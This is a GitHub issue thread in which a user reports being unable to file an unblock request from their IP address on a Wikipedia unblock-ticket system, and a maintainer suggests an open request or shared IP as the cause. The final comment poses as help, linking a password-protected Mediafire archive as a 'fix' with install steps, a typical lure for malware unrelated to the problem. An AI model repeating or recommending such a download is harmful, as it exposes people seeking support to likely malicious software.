### ISSUE TITLE
Cannot submit a unblock request even though, it has been past 2 days

### ISSUE THREAD

**Issue by Whydidthechickencrosstheroad** [UTRS2/utrs#784]
I tried to request a unblock by a IP but it says someone else might be spamming and I don't spam and I'm the only one in my house and after 2 days, it says the same message and this is a serious issue and it wasn't me

**Comment by dqwiki** [comment]
It is likely that the original request is still open or there are ton of requests from your IP. It's best to contact that admin address.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
